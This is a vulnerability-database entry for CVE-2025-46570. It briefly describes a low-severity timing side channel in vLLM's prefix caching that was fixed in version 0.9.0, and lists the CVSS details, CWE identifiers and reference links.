← Back to CVEs
CVE-2025-46570
LOW2.6
Description
vLLM is an inference and serving engine for large language models (LLMs). Prior to version 0.9.0, when a new prompt is processed, if the PageAttention mechanism finds a matching prefix chunk, the prefill process speeds up, which is reflected in the TTFT (Time to First Token). These timing differences caused by matching chunks are significant enough to be recognized and exploited. This issue has been patched in version 0.9.0.
CVE Details
CVSS v3.1 Score2.6
SeverityLOW
CVSS VectorCVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:N
Attack VectorNETWORK
ComplexityHIGH
Privileges RequiredLOW
User InteractionREQUIRED
Published5/29/2025
Last Modified6/24/2025
Sourcenvd
Honeypot Sightings0
Affected Products
vllm:vllm
Weaknesses (CWE)
CWE-208CWE-203
References
https://github.com/vllm-project/vllm/commit/77073c77bc2006eb80ea6d5128f076f5e6c6f54f(security-advisories@github.com)
https://github.com/vllm-project/vllm/pull/17045(security-advisories@github.com)
https://github.com/vllm-project/vllm/security/advisories/GHSA-4qjh-9fv9-r85r(security-advisories@github.com)
IOC Correlations
No correlations recorded
This product uses data from the NVD API but is not endorsed or certified by the NVD.